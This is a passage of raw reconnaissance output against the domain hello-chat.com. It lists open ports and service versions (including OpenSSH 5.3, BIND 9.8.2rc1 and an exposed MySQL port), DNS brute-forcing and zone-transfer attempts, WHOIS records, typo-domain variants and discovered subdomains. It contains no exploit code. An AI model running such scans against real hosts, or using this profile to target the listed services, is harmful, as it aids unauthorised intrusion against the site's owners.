881 80/tcp open ssl/http syn-ack ttl 53 Apache/2
882 | http-methods:
883 |_ Supported Methods: OPTIONS HEAD GET POST
884 |_http-server-header: Apache/2
885 |_http-title: Site doesn't have a title (text/html).
886 110/tcp open pop3 syn-ack ttl 53 Dovecot DirectAdmin pop3d
887 |_pop3-capabilities: UIDL TOP SASL(PLAIN) AUTH-RESP-CODE USER STLS CAPA RESP-CODES PIPELINING
888 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
889 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
890 | Public Key type: rsa
891 | Public Key bits: 4096
892 | Signature Algorithm: sha1WithRSAEncryption
893 | Not valid before: 2016-05-13T00:34:32
894 | Not valid after: 2043-09-28T00:34:32
895 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
896 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
897 |_ssl-date: 2020-03-19T00:51:20+00:00; +6m01s from scanner time.
898 143/tcp open imap syn-ack ttl 53 Dovecot imapd
899 |_imap-capabilities: OK AUTH=PLAINA0001 more have post-login SASL-IR capabilities LITERAL+ listed IDLE Pre-login LOGIN-REFERRALS STARTTLS ID ENABLE IMAP4rev1
900 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
901 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
902 | Public Key type: rsa
903 | Public Key bits: 4096
904 | Signature Algorithm: sha1WithRSAEncryption
905 | Not valid before: 2016-05-13T00:34:32
906 | Not valid after: 2043-09-28T00:34:32
907 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
908 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
909 |_ssl-date: 2020-03-19T00:51:21+00:00; +6m02s from scanner time.
910 443/tcp open ssl/ssl syn-ack ttl 53 Apache httpd (SSL-only mode)
911 | http-methods:
912 |_ Supported Methods: OPTIONS HEAD GET POST
913 |_http-server-header: Apache/2
914 |_http-title: Site doesn't have a title (text/html).
915 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
916 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
917 | Public Key type: rsa
918 | Public Key bits: 2048
919 | Signature Algorithm: sha1WithRSAEncryption
920 | Not valid before: 2019-06-04T16:48:56
921 | Not valid after: 2046-10-19T16:48:56
922 | MD5: 1c46 8407 1d70 7382 d40e 8cc7 ec33 e972
923 |_SHA-1: 068c 065f f10f e21c 83e3 9b69 2f58 aea4 6bc6 f592
924 |_ssl-date: 2020-03-19T00:51:19+00:00; +6m01s from scanner time.
925 465/tcp open ssl/smtp syn-ack ttl 53 Exim smtpd 4.92
926 | smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
927 |_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
928 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
929 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
930 | Public Key type: rsa
931 | Public Key bits: 4096
932 | Signature Algorithm: sha1WithRSAEncryption
933 | Not valid before: 2016-05-13T00:34:32
934 | Not valid after: 2043-09-28T00:34:32
935 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
936 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
937 |_ssl-date: 2020-03-19T00:51:20+00:00; +6m01s from scanner time.
938 587/tcp open smtp syn-ack ttl 53 Exim smtpd 4.92
939 | smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
940 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
941 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
942 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
943 | Public Key type: rsa
944 | Public Key bits: 4096
945 | Signature Algorithm: sha1WithRSAEncryption
946 | Not valid before: 2016-05-13T00:34:32
947 | Not valid after: 2043-09-28T00:34:32
948 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
949 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
950 |_ssl-date: 2020-03-19T00:51:21+00:00; +6m01s from scanner time.
951 993/tcp open ssl/imap syn-ack ttl 53
952 | fingerprint-strings:
953 | NULL:
954 |_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
955 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
956 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
957 | Public Key type: rsa
958 | Public Key bits: 4096
959 | Signature Algorithm: sha1WithRSAEncryption
960 | Not valid before: 2016-05-13T00:34:32
961 | Not valid after: 2043-09-28T00:34:32
962 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
963 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
964 |_ssl-date: 2020-03-19T00:51:19+00:00; +6m01s from scanner time.
965 995/tcp open ssl/pop3 syn-ack ttl 53 Dovecot DirectAdmin pop3d
966 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
967 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
968 | Public Key type: rsa
969 | Public Key bits: 4096
970 | Signature Algorithm: sha1WithRSAEncryption
971 | Not valid before: 2016-05-13T00:34:32
972 | Not valid after: 2043-09-28T00:34:32
973 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
974 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
975 |_ssl-date: 2020-03-19T00:51:20+00:00; +6m02s from scanner time.
976 3306/tcp open mysql syn-ack ttl 53 MySQL (unauthorized)
977 OS Info: Service Info: Host: server.18they.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
978 Scanning ip 97.74.102.13 (ns25.domaincontrol.com (PTR)):
979 53/tcp open tcpwrapped syn-ack ttl 51
980 WebCrawling domain's web servers... up to 50 max links.
981
982 + URL to crawl: https://www.hello-chat.com.:80
983 + Date: 2020-03-18
984
985 + Crawling URL: https://www.hello-chat.com.:80:
986 + Links:
987 + Crawling https://www.hello-chat.com.:80 ([SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:727))
988 + Searching for directories...
989 + Searching open folders...
990
991
992 + URL to crawl: http://www.hello-chat.com.:443
993 + Date: 2020-03-18
994
995 + Crawling URL: http://www.hello-chat.com.:443:
996 + Links:
997 + Crawling http://www.hello-chat.com.:443 (400 Bad Request)
998 + Searching for directories...
999 + Searching open folders...
1000
1001--Finished--
1002Summary information for domain hello-chat.com.
1003-----------------------------------------
1004
1005 Domain Ips Information:
1006 IP: 173.201.70.13
1007 HostName: ns26.domaincontrol.com Type: NS
1008 HostName: ns26.domaincontrol.com Type: PTR
1009 Country: United States
1010 Is Active: True (echo-reply ttl 52)
1011 Port: 53/tcp open tcpwrapped syn-ack ttl 52
1012 IP: 199.38.245.243
1013 HostName: www.hello-chat.com. Type: A
1014 Country: United States
1015 Is Active: True (syn-ack ttl 53)
1016 Port: 21/tcp open ftp syn-ack ttl 53 Pure-FTPd
1017 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1018 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1019 Script Info: | Public Key type: rsa
1020 Script Info: | Public Key bits: 2048
1021 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1022 Script Info: | Not valid before: 2019-06-04T16:48:56
1023 Script Info: | Not valid after: 2046-10-19T16:48:56
1024 Script Info: | MD5: 1c46 8407 1d70 7382 d40e 8cc7 ec33 e972
1025 Script Info: |_SHA-1: 068c 065f f10f e21c 83e3 9b69 2f58 aea4 6bc6 f592
1026 Script Info: |_ssl-date: 2020-03-19T00:51:20+00:00; +6m02s from scanner time.
1027 Port: 22/tcp open ssh syn-ack ttl 53 OpenSSH 5.3 (protocol 2.0)
1028 Script Info: | ssh-hostkey:
1029 Script Info: | 1024 1a:0d:eb:77:2b:24:04:b9:fb:ff:06:3a:d3:de:0b:fc (DSA)
1030 Script Info: |_ 2048 59:7a:97:24:cd:1c:5a:3a:87:31:41:1d:60:aa:27:dc (RSA)
1031 Port: 25/tcp open smtp syn-ack ttl 53 Exim smtpd 4.92
1032 Script Info: | smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
1033 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1034 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1035 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1036 Script Info: | Public Key type: rsa
1037 Script Info: | Public Key bits: 4096
1038 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1039 Script Info: | Not valid before: 2016-05-13T00:34:32
1040 Script Info: | Not valid after: 2043-09-28T00:34:32
1041 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1042 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1043 Script Info: |_ssl-date: 2020-03-19T00:51:20+00:00; +6m02s from scanner time.
1044 Port: 53/tcp open domain syn-ack ttl 53 ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
1045 Script Info: | dns-nsid:
1046 Script Info: |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
1047 Port: 80/tcp open ssl/http syn-ack ttl 53 Apache/2
1048 Script Info: | http-methods:
1049 Script Info: |_ Supported Methods: OPTIONS HEAD GET POST
1050 Script Info: |_http-server-header: Apache/2
1051 Script Info: |_http-title: Site doesn't have a title (text/html).
1052 Port: 110/tcp open pop3 syn-ack ttl 53 Dovecot DirectAdmin pop3d
1053 Script Info: |_pop3-capabilities: UIDL TOP SASL(PLAIN) AUTH-RESP-CODE USER STLS CAPA RESP-CODES PIPELINING
1054 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1055 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1056 Script Info: | Public Key type: rsa
1057 Script Info: | Public Key bits: 4096
1058 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1059 Script Info: | Not valid before: 2016-05-13T00:34:32
1060 Script Info: | Not valid after: 2043-09-28T00:34:32
1061 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1062 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1063 Script Info: |_ssl-date: 2020-03-19T00:51:20+00:00; +6m01s from scanner time.
1064 Port: 143/tcp open imap syn-ack ttl 53 Dovecot imapd
1065 Script Info: |_imap-capabilities: OK AUTH=PLAINA0001 more have post-login SASL-IR capabilities LITERAL+ listed IDLE Pre-login LOGIN-REFERRALS STARTTLS ID ENABLE IMAP4rev1
1066 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1067 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1068 Script Info: | Public Key type: rsa
1069 Script Info: | Public Key bits: 4096
1070 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1071 Script Info: | Not valid before: 2016-05-13T00:34:32
1072 Script Info: | Not valid after: 2043-09-28T00:34:32
1073 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1074 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1075 Script Info: |_ssl-date: 2020-03-19T00:51:21+00:00; +6m02s from scanner time.
1076 Port: 443/tcp open ssl/ssl syn-ack ttl 53 Apache httpd (SSL-only mode)
1077 Script Info: | http-methods:
1078 Script Info: |_ Supported Methods: OPTIONS HEAD GET POST
1079 Script Info: |_http-server-header: Apache/2
1080 Script Info: |_http-title: Site doesn't have a title (text/html).
1081 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1082 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1083 Script Info: | Public Key type: rsa
1084 Script Info: | Public Key bits: 2048
1085 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1086 Script Info: | Not valid before: 2019-06-04T16:48:56
1087 Script Info: | Not valid after: 2046-10-19T16:48:56
1088 Script Info: | MD5: 1c46 8407 1d70 7382 d40e 8cc7 ec33 e972
1089 Script Info: |_SHA-1: 068c 065f f10f e21c 83e3 9b69 2f58 aea4 6bc6 f592
1090 Script Info: |_ssl-date: 2020-03-19T00:51:19+00:00; +6m01s from scanner time.
1091 Port: 465/tcp open ssl/smtp syn-ack ttl 53 Exim smtpd 4.92
1092 Script Info: | smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
1093 Script Info: |_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1094 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1095 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1096 Script Info: | Public Key type: rsa
1097 Script Info: | Public Key bits: 4096
1098 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1099 Script Info: | Not valid before: 2016-05-13T00:34:32
1100 Script Info: | Not valid after: 2043-09-28T00:34:32
1101 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1102 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1103 Script Info: |_ssl-date: 2020-03-19T00:51:20+00:00; +6m01s from scanner time.
1104 Port: 587/tcp open smtp syn-ack ttl 53 Exim smtpd 4.92
1105 Script Info: | smtp-commands: server.18they.com Hello nmap.scanme.org [45.132.192.91], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
1106 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1107 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1108 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1109 Script Info: | Public Key type: rsa
1110 Script Info: | Public Key bits: 4096
1111 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1112 Script Info: | Not valid before: 2016-05-13T00:34:32
1113 Script Info: | Not valid after: 2043-09-28T00:34:32
1114 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1115 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1116 Script Info: |_ssl-date: 2020-03-19T00:51:21+00:00; +6m01s from scanner time.
1117 Port: 993/tcp open ssl/imap syn-ack ttl 53
1118 Script Info: | fingerprint-strings:
1119 Script Info: | NULL:
1120 Script Info: |_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
1121 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1122 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1123 Script Info: | Public Key type: rsa
1124 Script Info: | Public Key bits: 4096
1125 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1126 Script Info: | Not valid before: 2016-05-13T00:34:32
1127 Script Info: | Not valid after: 2043-09-28T00:34:32
1128 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1129 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1130 Script Info: |_ssl-date: 2020-03-19T00:51:19+00:00; +6m01s from scanner time.
1131 Port: 995/tcp open ssl/pop3 syn-ack ttl 53 Dovecot DirectAdmin pop3d
1132 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1133 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1134 Script Info: | Public Key type: rsa
1135 Script Info: | Public Key bits: 4096
1136 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1137 Script Info: | Not valid before: 2016-05-13T00:34:32
1138 Script Info: | Not valid after: 2043-09-28T00:34:32
1139 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1140 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1141 Script Info: |_ssl-date: 2020-03-19T00:51:20+00:00; +6m02s from scanner time.
1142 Port: 3306/tcp open mysql syn-ack ttl 53 MySQL (unauthorized)
1143 Os Info: Host: server.18they.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
1144 IP: 97.74.102.13
1145 HostName: ns25.domaincontrol.com Type: NS
1146 HostName: ns25.domaincontrol.com Type: PTR
1147 Country: United States
1148 Is Active: True (echo-reply ttl 51)
1149 Port: 53/tcp open tcpwrapped syn-ack ttl 51
1150
1151--------------End Summary --------------
1152-----------------------------------------
1153#################################################################################################################################
1154----- hello-chat.com -----
1155
1156
1157Host's addresses:
1158__________________
1159
1160hello-chat.com. 69 IN A 199.38.245.243
1161
1162
1163Name Servers:
1164______________
1165
1166ns25.domaincontrol.com. 86117 IN A 97.74.102.13
1167ns26.domaincontrol.com. 86117 IN A 173.201.70.13
1168
1169
1170Mail (MX) Servers:
1171___________________
1172
1173
1174
1175
1176
1177Brute forcing with /usr/share/dnsenum/dns.txt:
1178_______________________________________________
1179
1180www.hello-chat.com. 3070 IN CNAME hello-chat.com.
1181hello-chat.com. 7 IN A 199.38.245.243
1182
1183
1184Launching Whois Queries:
1185_________________________
1186
1187 whois ip result: 199.38.245.0 -> 199.38.240.0/21
1188
1189
1190hello-chat.com______________
1191
1192 199.38.240.0/21
1193
1194####################################################################################################################################
1195
1196----- hello-chat.com -----
1197
1198
1199Host's addresses:
1200__________________
1201
1202hello-chat.com. 352 IN A 199.38.245.243
1203
1204
1205Name Servers:
1206______________
1207
1208ns25.domaincontrol.com. 86400 IN A 97.74.102.13
1209ns26.domaincontrol.com. 86400 IN A 173.201.70.13
1210
1211
1212Mail (MX) Servers:
1213___________________
1214
1215
1216
1217Trying Zone Transfers and getting Bind Versions:
1218_________________________________________________
1219
1220
1221Trying Zone Transfer for hello-chat.com on ns25.domaincontrol.com ...
1222
1223Trying Zone Transfer for hello-chat.com on ns26.domaincontrol.com ...
1224
1225
1226Brute forcing with /usr/share/sniper/wordlists/vhosts.txt:
1227___________________________________________________________
1228
1229www.hello-chat.com. 3387 IN CNAME hello-chat.com.
1230hello-chat.com. 324 IN A 199.38.245.243
1231
1232
1233hello-chat.com class C netranges:
1234__________________________________
1235
1236 199.38.245.0/24
1237
1238
1239hello-chat.com ip blocks:
1240__________________________
1241
1242 199.38.245.243/32
1243
1244done.
1245#################################################################################################################################
1246 Domain Name: HELLO-CHAT.COM
1247 Registry Domain ID: 1577617153_DOMAIN_COM-VRSN
1248 Registrar WHOIS Server: whois.godaddy.com
1249 Registrar URL: http://www.godaddy.com
1250 Updated Date: 2020-01-29T02:00:13Z
1251 Creation Date: 2009-12-01T18:54:28Z
1252 Registry Expiry Date: 2020-12-01T18:54:28Z
1253 Registrar: GoDaddy.com, LLC
1254 Registrar IANA ID: 146
1255 Registrar Abuse Contact Email: abuse@godaddy.com
1256 Registrar Abuse Contact Phone: 480-624-2505
1257 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
1258 Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
1259 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
1260 Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
1261 Name Server: NS25.DOMAINCONTROL.COM
1262 Name Server: NS26.DOMAINCONTROL.COM
1263 DNSSEC: unsigned
1264#################################################################################################################################
1265Domain Name: HELLO-CHAT.COM
1266Registry Domain ID: 1577617153_DOMAIN_COM-VRSN
1267Registrar WHOIS Server: whois.godaddy.com
1268Registrar URL: http://www.godaddy.com
1269Updated Date: 2019-12-05T13:56:29Z
1270Creation Date: 2009-12-01T18:54:28Z
1271Registrar Registration Expiration Date: 2020-12-01T18:54:28Z
1272Registrar: GoDaddy.com, LLC
1273Registrar IANA ID: 146
1274Registrar Abuse Contact Email: abuse@godaddy.com
1275Registrar Abuse Contact Phone: +1.4806242505
1276Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
1277Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
1278Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
1279Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
1280Registrant Organization:
1281Registrant State/Province: Florida
1282Registrant Country: US
1283Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=HELLO-CHAT.COM
1284Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=HELLO-CHAT.COM
1285Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=HELLO-CHAT.COM
1286Name Server: NS25.DOMAINCONTROL.COM
1287Name Server: NS26.DOMAINCONTROL.COM
1288DNSSEC: unsigned
1289#################################################################################################################################
1290Source:
1291whois.arin.net
1292IP Address:
1293199.38.245.243
1294Name:
1295WISC-5
1296Handle:
1297NET-199-38-240-0-1
1298Registration Date:
129911/20/15
1300Range:
1301199.38.240.0-199.38.247.255
1302Org:
1303WhiteLabel IT Solutions Corp
1304Org Handle:
1305WISC-5
1306Address:
1307150 Atlantic Street
1308City:
1309Hackensack
1310State/Province:
1311NJ
1312Postal Code:
131307601
1314Country:
1315United States
1316Name Servers:
1317#################################################################################################################################
1318URLCrazy Domain Report
1319Domain : hello-chat.com
1320Keyboard : qwerty
1321At : 2020-03-18 20:41:17 -0400
1322
1323# Please wait. 124 hostnames to process
1324
1325Typo Type Typo DNS-A CC-A DNS-MX Extn
1326-------------------------------------------------------------------------------------------------------------------------------------
1327Character Omission hell-chat.com ? com
1328Character Omission hello-cat.com ? com
1329Character Omission hello-cha.com ? com
1330Character Omission hello-chat.cm ? cm
1331Character Omission hello-cht.com ? com
1332Character Omission hello-hat.com ? com
1333Character Omission hellochat.com 184.168.131.241 US,UNITED STATES hellochat-com.mail.protection.outlook.com com
1334Character Omission helo-chat.com ? com
1335Character Omission hllo-chat.com ? com
1336Character Repeat heello-chat.com ? com
1337Character Repeat helllo-chat.com ? com
1338Character Repeat hello--chat.com ? com
1339Character Repeat hello-cchat.com ? com
1340Character Repeat hello-chaat.com ? com
1341Character Repeat hello-chatt.com ? com
1342Character Repeat hello-chhat.com ? com
1343Character Repeat helloo-chat.com ? com
1344Character Repeat hhello-chat.com ? com
1345Character Swap ehllo-chat.com ? com
1346Character Swap hell-ochat.com ? com
1347Character Swap hello-caht.com ? com
1348Character Swap hello-chta.com ? com
1349Character Swap hello-hcat.com ? com
1350Character Swap helloc-hat.com ? com
1351Character Swap helol-chat.com ? com
1352Character Swap hlelo-chat.com ? com
1353Character Replacement gello-chat.com ? com
1354Character Replacement heklo-chat.com ? com
1355Character Replacement helko-chat.com ? com
1356Character Replacement helli-chat.com ? com
1357Character Replacement hello-cgat.com ? com
1358Character Replacement hello-char.com ? com
1359Character Replacement hello-chay.com ? com
1360Character Replacement hello-chst.com ? com
1361Character Replacement hello-cjat.com ? com
1362Character Replacement hello-vhat.com ? com
1363Character Replacement hello-xhat.com ? com
1364Character Replacement hello0chat.com ? com
1365Character Replacement hellp-chat.com ? com
1366Character Replacement hrllo-chat.com ? com
1367Character Replacement hwllo-chat.com ? com
1368Character Replacement jello-chat.com ? com
1369Double Character Replacement hekko-chat.com ? com
1370Character Insertion helklo-chat.com ? com
1371Character Insertion hellko-chat.com ? com
1372Character Insertion hello-0chat.com ? com
1373Character Insertion hello-chast.com ? com
1374Character Insertion hello-chatr.com ? com
1375Character Insertion hello-chaty.com ? com
1376Character Insertion hello-chgat.com ? com
1377Character Insertion hello-chjat.com ? com
1378Character Insertion hello-cvhat.com ? com
1379Character Insertion hello-cxhat.com ? com
1380Character Insertion helloi-chat.com ? com
1381Character Insertion hellop-chat.com ? com
1382Character Insertion herllo-chat.com ? com
1383Character Insertion hewllo-chat.com ? com
1384Character Insertion hgello-chat.com ? com
1385Character Insertion hjello-chat.com ? com
1386Missing Dot hello-chatcom.com ? com
1387Missing Dot wwwhello-chat.com ? com
1388Singular or Pluralise hello-chats.com ? com
1389Vowel Swap hallo-chat.com ? com
1390Vowel Swap hello-chet.com ? com
1391Vowel Swap hello-chit.com ? com
1392Vowel Swap hello-chot.com ? com
1393Vowel Swap hello-chut.com ? com
1394Vowel Swap hillo-chat.com ? com
1395Vowel Swap hollo-chat.com ? com
1396Vowel Swap hullo-chat.com ? com
1397Homophones hellow-chat.com ? com
1398Bit Flipping hdllo-chat.com ? com
1399Bit Flipping hedlo-chat.com ? com
1400Bit Flipping hehlo-chat.com ? com
1401Bit Flipping heldo-chat.com ? com
1402Bit Flipping helho-chat.com ? com
1403Bit Flipping hellg-chat.com ? com
1404Bit Flipping hellk-chat.com ? com
1405Bit Flipping hellm-chat.com ? com
1406Bit Flipping helln-chat.com ? com
1407Bit Flipping hello-ahat.com ? com
1408Bit Flipping hello-bhat.com ? com
1409Bit Flipping hello-cha4.com ? com
1410Bit Flipping hello-chad.com ? com
1411Bit Flipping hello-chap.com ? com
1412Bit Flipping hello-chau.com 198.185.159.145 com
1413Bit Flipping hello-chav.com ? com
1414Bit Flipping hello-chct.com ? com
1415Bit Flipping hello-chqt.com ? com
1416Bit Flipping hello-ciat.com ? com
1417Bit Flipping hello-clat.com ? com
1418Bit Flipping hello-cxat.com ? com
1419Bit Flipping hello-ghat.com ? com
1420Bit Flipping hello-khat.com ? com
1421Bit Flipping hello-shat.com ? com
1422Bit Flipping hellomchat.com ? com
1423Bit Flipping helmo-chat.com ? com
1424Bit Flipping helno-chat.com ? com
1425Bit Flipping hemlo-chat.com ? com
1426Bit Flipping henlo-chat.com ? com
1427Bit Flipping hgllo-chat.com ? com
1428Bit Flipping hmllo-chat.com ? com
1429Bit Flipping iello-chat.com ? com
1430Bit Flipping lello-chat.com ? com
1431Bit Flipping xello-chat.com ? com
1432Homoglyphs he11o-chat.com ? com
1433Homoglyphs he1lo-chat.com ? com
1434Homoglyphs hel1o-chat.com ? com
1435Homoglyphs hell0-chat.com ? com
1436Wrong TLD hello-chat.ca ? ca
1437Wrong TLD hello-chat.ch ? ch
1438Wrong TLD hello-chat.de ? de
1439Wrong TLD hello-chat.edu ? edu
1440Wrong TLD hello-chat.es ? es
1441Wrong TLD hello-chat.fr ? fr
1442Wrong TLD hello-chat.it ? it
1443Wrong TLD hello-chat.jp ? jp
1444Wrong TLD hello-chat.net 153.122.21.69 JP,JAPAN hello-chat.net net
1445Wrong TLD hello-chat.nl ? nl
1446Wrong TLD hello-chat.no ? no
1447Wrong TLD hello-chat.org ? org
1448Wrong TLD hello-chat.ru ? ru
1449Wrong TLD hello-chat.se ? se
1450Wrong TLD hello-chat.us ? us
1451#################################################################################################################################
1452ThreatCrowd: www.hello-chat.com
1453Virustotal: www.hello-chat.com
1454Virustotal: webmail.hello-chat.com
1455Virustotal: webdisk.hello-chat.com
1456Virustotal: mail.hello-chat.com
1457Virustotal: cpanel.hello-chat.com
1458Virustotal: autodiscover.hello-chat.com
1459Yahoo: www.hello-chat.com
1460[-] Saving results to file: /usr/share/sniper/loot/workspace/hello-chat.com/domains/domains-hello-chat.com.txt
1461[-] Total Unique Subdomains Found: 6
1462www.hello-chat.com
1463autodiscover.hello-chat.com
1464cpanel.hello-chat.com
1465mail.hello-chat.com
1466webdisk.hello-chat.com
1467webmail.hello-chat.com
1468##################################################################################################################################
1469
1470autodiscover.hello-chat.com
1471cpanel.hello-chat.com
1472hello-chat.com
1473hello-chat.com.collectable18.com
1474mail.hello-chat.com
1475webdisk.hello-chat.com
1476webmail.hello-chat.com
1477www.hello-chat.com
1478www.hello-chat.com.collectable18.com
1479##################################################################################################################################
1480www.hello-chat.com
1481www.hello-chat.com
1482autodiscover.hello-chat.com
1483cpanel.hello-chat.com
1484mail.hello-chat.com
1485webdisk.hello-chat.com
1486webmail.hello-chat.com
1487domain
